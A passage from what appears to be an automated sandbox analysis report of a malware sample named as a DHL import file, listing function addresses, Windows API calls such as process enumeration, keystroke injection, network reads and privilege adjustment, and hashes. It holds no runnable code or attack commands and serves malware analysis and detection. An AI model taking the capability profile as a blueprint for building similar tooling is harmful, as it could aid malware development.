                                                                                          • Opcode Fuzzy Hash: 2d1f4ec01169df6f5e532ec3b9ac5b38a9b493c49563cab27d6dfc3ba7ad7341
                                                                                          • Instruction Fuzzy Hash: 3151C575A00200AFDB20AF24C88AF6A77E5EB49718F488059F9469F3C3D775AD41CBE1
                                                                                          Function 00861C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                          • String ID:
                                                                                          • API String ID: 292994002-0
                                                                                          • Opcode ID: fa1c510c92f71a44183b1f8e5f98e4bbb2f1496c268848bb3d90c1e27a7b90f3
                                                                                          • Instruction ID: d7b476685c5036323670efa49097e54a96110d3657607d406b4f57230eb82c94
                                                                                          • Opcode Fuzzy Hash: fa1c510c92f71a44183b1f8e5f98e4bbb2f1496c268848bb3d90c1e27a7b90f3
                                                                                          • Instruction Fuzzy Hash: DB21D3317406119FDB218F1AC848B6A7BA5FF95315F1E9059E846CB352CBB1DC42CB90
                                                                                          Function 007D8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                          • API String ID: 0-1546025612
                                                                                          • Opcode ID: 197ec7f99e5b1b797b22c70d3cdc9baff3613a66090e434043ec4e380ec29589
                                                                                          • Instruction ID: d409fa4a79257bdfecf4136f0143f8ed5c999219fa8d34c4f6b321a029d7b4e1
                                                                                          • Opcode Fuzzy Hash: 197ec7f99e5b1b797b22c70d3cdc9baff3613a66090e434043ec4e380ec29589
                                                                                          • Instruction Fuzzy Hash: 0EA25870A0061ACBDF64CF58C8407EEB7B5FF54310F2481AAE859A7385EB789D91CB91
                                                                                          Function 0085A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0085A6AC
                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0085A6BA
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0085A79C
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0085A7AB
                                                                                            • Part of subcall function 007ECE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00813303,?), ref: 007ECE8A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 1991900642-0
                                                                                          • Opcode ID: 690d3c45b6119281710e09973d1d178c355483ec122e0d1b1becffb2b238cfb4
                                                                                          • Instruction ID: ec0196fc160b5efc5a98d68b565118446e13228d187ddfddd41e23352c7f7aaf
                                                                                          • Opcode Fuzzy Hash: 690d3c45b6119281710e09973d1d178c355483ec122e0d1b1becffb2b238cfb4
                                                                                          • Instruction Fuzzy Hash: 07513971508340AFD314EF25C886A6BBBF8FF89754F00491EF98597291EB74E904CB92
                                                                                          Function 0083AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0083AAAC
                                                                                          • SetKeyboardState.USER32(00000080), ref: 0083AAC8
                                                                                          • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0083AB36
                                                                                          • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0083AB88
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                          • String ID:
                                                                                          • API String ID: 432972143-0
                                                                                          • Opcode ID: c1289621ef6fc8113d81879dd83dc121cbc19f26e1caf4e89d24fb9a0006d99e
                                                                                          • Instruction ID: 1c4dd50867b670278d92aee27b406b60f581e98524990bf9f8bdccb7228a09e0
                                                                                          • Opcode Fuzzy Hash: c1289621ef6fc8113d81879dd83dc121cbc19f26e1caf4e89d24fb9a0006d99e
                                                                                          • Instruction Fuzzy Hash: 9F31F731A40248AEEF298A64CC05BFAB7A6FBD4320F04421AE1C1D61D1D3758981C7E3
                                                                                          Function 0080BB6F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 0080BB7F
                                                                                            • Part of subcall function 008029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000), ref: 008029DE
                                                                                            • Part of subcall function 008029C8: GetLastError.KERNEL32(00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000,00000000), ref: 008029F0
                                                                                          • GetTimeZoneInformation.KERNEL32 ref: 0080BB91
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,?,008A121C,000000FF,?,0000003F,?,?), ref: 0080BC09
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,?,008A1270,000000FF,?,0000003F,?,?,?,008A121C,000000FF,?,0000003F,?,?), ref: 0080BC36
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                          • String ID:
                                                                                          • API String ID: 806657224-0
                                                                                          • Opcode ID: d7e83fab3492b721eb20f96c944ae07fd5165e203aa77770b94b96a707cd241f
                                                                                          • Instruction ID: 925127baeb7b1a86cf7a00e3e7dee877dd16a151ba870cea5b9ebd4b0412efde
                                                                                          • Opcode Fuzzy Hash: d7e83fab3492b721eb20f96c944ae07fd5165e203aa77770b94b96a707cd241f
                                                                                          • Instruction Fuzzy Hash: BC31DE71904245DFEB50DFA8CC80A79BBB8FF56760B1546AAE060DB6E1D7309E40CB50
                                                                                          Function 0084CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 0084CE89
                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 0084CEEA
                                                                                          • SetEvent.KERNEL32(?,?,00000000), ref: 0084CEFE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorEventFileInternetLastRead
                                                                                          • String ID:
                                                                                          • API String ID: 234945975-0
                                                                                          • Opcode ID: 09613549167c877435786894739655993964d7a84896adeffc839c135edca722
                                                                                          • Instruction ID: d13f615fe9dd71af066f9f936798a4cb40ead43079b49d0ec08ed99b0437674c
                                                                                          • Opcode Fuzzy Hash: 09613549167c877435786894739655993964d7a84896adeffc839c135edca722
                                                                                          • Instruction Fuzzy Hash: EB219DB1501309DBDB60DFA5C948BA67BFCFB50358F10442EE646D2251EBB8EE088B64
                                                                                          Function 0083DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • lstrlenW.KERNEL32(?,00815222), ref: 0083DBCE
                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 0083DBDD
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0083DBEE
                                                                                          • FindClose.KERNEL32(00000000), ref: 0083DBFA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 2695905019-0
                                                                                          • Opcode ID: 7672076da8f277fc62cb8c6bceba95732052c8c7df1b80b1062385e9ac4c5d77
                                                                                          • Instruction ID: 6cc1cdc8f9ab526b69dd2bd3342de2da68d6266c416b5989cf4d133a0acbe677
                                                                                          • Opcode Fuzzy Hash: 7672076da8f277fc62cb8c6bceba95732052c8c7df1b80b1062385e9ac4c5d77
                                                                                          • Instruction Fuzzy Hash: CAF0A070820A145782206B78AC0D8BA776CFF82334F106702F8B6C22E0EBF0995686D5
                                                                                          Function 00838298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 008382AA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrlen
                                                                                          • String ID: ($|
                                                                                          • API String ID: 1659193697-1631851259
                                                                                          • Opcode ID: 1411371e751f673ccf1b52182ac95e6361ccd82be271cf1854ef6091b0c073c8
                                                                                          • Instruction ID: 64c966326a44e0079280fccdb932b3a572c3da6d10bf57cec72b1dad5ba512d3
                                                                                          • Opcode Fuzzy Hash: 1411371e751f673ccf1b52182ac95e6361ccd82be271cf1854ef6091b0c073c8
                                                                                          • Instruction Fuzzy Hash: 2D322474A00705DFCB28CF59C481A6AB7F1FF88710B15856EE49ADB7A1EB70E941CB80
                                                                                          Function 00845C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00845CC1
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00845D17
                                                                                          • FindClose.KERNEL32(?), ref: 00845D5F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                          • String ID:
                                                                                          • API String ID: 3541575487-0
                                                                                          • Opcode ID: 4754485e26c51aeb89732aea945e76b312739609f01e05a676dea7464bccd9cd
                                                                                          • Instruction ID: b9c2d6032b809a8e616c88f3b18d6dbe58550f374d975ec3ebb6f8c0026b76e9
                                                                                          • Opcode Fuzzy Hash: 4754485e26c51aeb89732aea945e76b312739609f01e05a676dea7464bccd9cd
                                                                                          • Instruction Fuzzy Hash: B351AA74A04A05DFC714DF28C498A9AB7E4FF49314F14856EE99ACB3A2DB34ED04CB91
                                                                                          Function 00802622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0080271A
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00802724
                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00802731
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                          • String ID:
                                                                                          • API String ID: 3906539128-0
                                                                                          • Opcode ID: 32fe3c9c3b58d90935250429582a91193bf055638e3b9bf807ad768213ce3228
                                                                                          • Instruction ID: eb77e74e7a962f30dde7360b37ceb807e1fed58abaa9952aaf2971939729646c
                                                                                          • Opcode Fuzzy Hash: 32fe3c9c3b58d90935250429582a91193bf055638e3b9bf807ad768213ce3228
                                                                                          • Instruction Fuzzy Hash: C631C27591121CABCB21DF68DD88798BBB8BF08310F5041EAE91CA63A1E7749F818F44
                                                                                          Function 008451CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 008451DA
                                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00845238
                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 008452A1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                                          • String ID:
                                                                                          • API String ID: 1682464887-0
                                                                                          • Opcode ID: 1b4bcf59f19a4a550b597216b689de6de8e9148f62cca4a649056a64d68db96e
                                                                                          • Instruction ID: 85c0d79e280561a646340f4dc548569e0846378fbe865623ba5a8f80ab608278
                                                                                          • Opcode Fuzzy Hash: 1b4bcf59f19a4a550b597216b689de6de8e9148f62cca4a649056a64d68db96e
                                                                                          • Instruction Fuzzy Hash: 2B318E35A00518DFDB00DF94D888EADBBB4FF49318F08809AE805AB362DB75E855CB90
                                                                                          Function 008316C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007EFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 007F0668
                                                                                            • Part of subcall function 007EFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 007F0685
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0083170D
                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0083173A
                                                                                          • GetLastError.KERNEL32 ref: 0083174A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                          • String ID:
                                                                                          • API String ID: 577356006-0
                                                                                          • Opcode ID: 58827f8d14909b034279940e6992d042fac84bc7f03041d6f3f1f5a8f82ceda1
                                                                                          • Instruction ID: f3e1919d67c761e357f66c4e7ac03f127fcd5367de9ea48aadaab049b78ae210
                                                                                          • Opcode Fuzzy Hash: 58827f8d14909b034279940e6992d042fac84bc7f03041d6f3f1f5a8f82ceda1
                                                                                          • Instruction Fuzzy Hash: 9311C1B2504309AFDB18EF54DC8AD6ABBFDFB44B54B24852EE05693641EB70BC418A60
                                                                                          Function 0083D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0083D608
                                                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0083D645
                                                                                          • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0083D650
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                                                          • String ID:
                                                                                          • API String ID: 33631002-0
                                                                                          • Opcode ID: 2c0159cb034bbc56c47f602d54026fdc6550204c470df70eca04ce7347a1cc8c
                                                                                          • Instruction ID: b532bf203b324693056bf32bca681d7f2deb90c6d1028b785c47d9fed2178633
                                                                                          • Opcode Fuzzy Hash: 2c0159cb034bbc56c47f602d54026fdc6550204c470df70eca04ce7347a1cc8c
                                                                                          • Instruction Fuzzy Hash: 17113C75E05228BBDB108F95EC45FAFBBBCFB85B50F108115F914E7290D6B05A058BE1
                                                                                          Function 00831663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0083168C
                                                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 008316A1
                                                                                          • FreeSid.ADVAPI32(?), ref: 008316B1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                          • String ID:
                                                                                          • API String ID: 3429775523-0
                                                                                          • Opcode ID: d6fbf2ea850c8917f5b846fb9fa9dbfa84125726c14533c64ba40ad12cb9d351
                                                                                          • Instruction ID: 5e2feecb5096c8d62124e64203b02c8e12ba0a6330c4cd56f6d8878f0bd86d00
                                                                                          • Opcode Fuzzy Hash: d6fbf2ea850c8917f5b846fb9fa9dbfa84125726c14533c64ba40ad12cb9d351
                                                                                          • Instruction Fuzzy Hash: 7BF0F471950309FBDF00DFE49D89EAEBBBCFB08604F505565E501E2181E774AA448A51
                                                                                          Function 007F4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(008028E9,?,007F4CBE,008028E9,008988B8,0000000C,007F4E15,008028E9,00000002,00000000,?,008028E9), ref: 007F4D09
                                                                                          • TerminateProcess.KERNEL32(00000000,?,007F4CBE,008028E9,008988B8,0000000C,007F4E15,008028E9,00000002,00000000,?,008028E9), ref: 007F4D10
                                                                                          • ExitProcess.KERNEL32 ref: 007F4D22
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 1703294689-0
                                                                                          • Opcode ID: 9aac5f8ee320f9e9dca371b24d31fa69c72b9c42f3dab0f0e04cae924e7e70b0
                                                                                          • Instruction ID: 433c80882f9422c90227bab89fa1846ec56190dfd2ca64c4c5c1c6471c6b4921
                                                                                          • Opcode Fuzzy Hash: 9aac5f8ee320f9e9dca371b24d31fa69c72b9c42f3dab0f0e04cae924e7e70b0
